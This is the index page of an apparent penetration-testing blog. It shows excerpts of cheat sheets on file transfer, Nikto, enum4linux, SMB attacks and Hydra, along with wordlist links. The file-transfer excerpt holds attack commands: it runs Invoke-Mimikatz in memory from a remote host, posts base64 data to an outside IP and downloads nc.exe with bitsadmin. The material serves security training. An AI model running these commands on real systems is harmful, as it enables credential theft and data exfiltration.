NetwerkLABS

FILE TRANSFER – Cheat Sheet

CommandDescription Invoke-WebRequest https://<snip>/PowerView.ps1 -OutFile PowerView.ps1Download a file with PowerShellIEX (New-Object Net.WebClient).DownloadString('https://<snip>/Invoke-Mimikatz.ps1')Execute a file in memory using PowerShellInvoke-WebRequest -Uri http://10.10.10.1:443 -Method POST -Body $b64Upload a file with PowerShellbitsadmin /transfer n http://10.10.10.1/nc.exe C:\Temp\nc.exeDownload…

Bharath Narayanasamy

Cheat Sheets

Nikto Cheat Sheet

Nikto Cheat Sheet COMMANDDESCRIPTIONnikto -h http://nlabs.localScans the specified hostnikto -h http://nlabs.local -Tuning 6Uses a specific scan tuning levelnikto -h http://nlabs.local -port 8080Scans the specified portnikto -h http://nlabs.local -sslScans for SSL…

Bharath Narayanasamy

Cheat Sheets

Enum4Linux Cheat sheet

enum4linux Cheat Sheet COMMANDDESCRIPTIONenum4linux -v target-ipVerbose mode, shows the underlying commands being executed by enum4linuxenum4linux -a target-ipDo Everything, runs all options apart from dictionary based share name guessingenum4linux -U target-ipLists…

Bharath Narayanasamy

Cheat Sheets

Linux Commands – Cheat Sheet

Bash Commands uname -aShow system and kernelhead -n1 /etc/issueShow distributionmountShow mounted filesystemsdateShow system dateuptimeShow uptimewhoamiShow your usernameman commandShow manual for command ls Options -aShow all (including hidden)-RRecursive list-rReverse order-tSort by last modified-SSort…

Bharath Narayanasamy

Cheat Sheets

Cheat sheet – SMB Attacks

SMB Enumeration Enumerate Hostname - nmblookup -A [ip] List Shares smbmap -H [ip/hostname] echo exit | smbclient -L \\\\[ip] nmap --script smb-enum-shares -p 139,445 [ip] Check Null Sessions smbmap -H [ip/hostname]…

Bharath Narayanasamy

VulnLAB

ATTACKING COMMONLY USED SERVICES: PART_03 Exploiting SMB

Server Message Block (SMB) is a communication protocol created for providing shared access to files and printers across nodes on a network. Initially, it was designed to run on top…

Bharath Narayanasamy

VulnLAB

Helpful Websites

Wordlists https://github.com/danielmiessler/SecLists https://github.com/Dormidera/WordList-Compendium https://github.com/kaonashi-passwords/Kaonashi https://github.com/google/fuzzing/tree/master/dictionaries https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm https://weakpass.com/wordlist/ https://wordlists.assetnote.io/ https://github.com/fssecur3/fuzzlists https://hashkiller.io/listmanager https://github.com/Karanxa/Bug-Bounty-Wordlists General Linux Kernel CVEs | All CVEs https://github.com/lucyoa/kernel-exploits Basic Linux Privilege Escalation - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Linux Privilege Escalation - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md Checklist -…

Bharath Narayanasamy

VulnLAB

Hydra Cheat Sheet

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible…

Bharath Narayanasamy

Disclaimer

Disclaimer – Use of this blog means agreement to the following terms:

Use of this blog means agreement to the following terms: 1. Information provided on this blog are for educational purposes only. The site is no way responsible for any misuse of…

zyberbkay

VulnLAB

ATTACKING COMMONLY USED SERVICES: PART_03 Exploiting FTP

By default, FTP service uses TCP port 21. However, it's possible to modify the default port and run the ftp service using another TCP port. Basic FTP Commands CommandDescription?/helpprint local…

Bharath Narayanasamy